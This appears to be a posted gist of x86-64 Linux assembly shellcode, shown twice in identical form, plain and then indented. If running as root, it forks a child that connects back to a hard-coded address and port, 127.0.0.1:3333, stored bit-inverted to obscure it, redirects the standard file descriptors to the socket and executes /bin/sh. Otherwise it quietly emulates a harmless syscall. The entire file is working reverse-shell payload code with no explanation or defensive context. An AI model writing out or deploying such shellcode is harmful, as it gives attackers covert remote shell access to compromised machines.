itszn/shellcode.asm Secret

## shellcode.asm
nop
push rbx
xor rax,rax
mov al, 0x66
syscall #check uid
xor rbx,rbx
cmp rbx,rax
jne emulate #If not root, only emulate.

xor rax,rax
mov al,0x39
syscall #fork
xor rbx,rbx
cmp rax,rbx
je connectback

emulate:
pop rbx
xor rax,rax
mov al,0x60
syscall
retq

connectback:
xor rdx,rdx
pushq 0x1
pop rsi
pushq 0x2
pop rdi
pushq 0x29
pop rax
syscall #socket

xchg rdi,rax
push rax
mov rcx, 0xfeffff80faf2fffd #NOT'ed 127.0.0.1:3333
not rcx
push rcx
mov rsi,rsp
pushq 0x10
pop rdx
pushq 0x2a
pop rax
syscall #connect

xor rbx,rbx
cmp rax,rbx
je sh
xor rax,rax
mov al,0xe7
syscall #exit

sh:
nop
pushq 0x3
pop rsi
duploop:
pushq 0x21
pop rax
dec rsi
syscall #dup
jne duploop

mov rbx,0xff978cd091969dd0 #NOT'ed "/bin/sh"
not rbx
push rbx
mov rdi,rsp
push rax
push rdi
mov rsi,rsp
xor rdx,rdx
mov al,0x3b
syscall #execve
xor rax,rax
mov al,0xe7
syscall #exit
	nop
	push rbx
	xor rax,rax
	mov al, 0x66
	syscall #check uid
	xor rbx,rbx
	cmp rbx,rax
	jne emulate #If not root, only emulate.

	xor rax,rax
	mov al,0x39
	syscall #fork
	xor rbx,rbx
	cmp rax,rbx
	je connectback

	emulate:
	pop rbx
	xor rax,rax
	mov al,0x60
	syscall
	retq

	connectback:
	xor rdx,rdx
	pushq 0x1
	pop rsi
	pushq 0x2
	pop rdi
	pushq 0x29
	pop rax
	syscall #socket

	xchg rdi,rax
	push rax
	mov rcx, 0xfeffff80faf2fffd #NOT'ed 127.0.0.1:3333
	not rcx
	push rcx
	mov rsi,rsp
	pushq 0x10
	pop rdx
	pushq 0x2a
	pop rax
	syscall #connect

	xor rbx,rbx
	cmp rax,rbx
	je sh
	xor rax,rax
	mov al,0xe7
	syscall #exit

	sh:
	nop
	pushq 0x3
	pop rsi
	duploop:
	pushq 0x21
	pop rax
	dec rsi
	syscall #dup
	jne duploop

	mov rbx,0xff978cd091969dd0 #NOT'ed "/bin/sh"
	not rbx
	push rbx
	mov rdi,rsp
	push rax
	push rdi
	mov rsi,rsp
	xor rdx,rdx
	mov al,0x3b
	syscall #execve
	xor rax,rax
	mov al,0xe7
	syscall #exit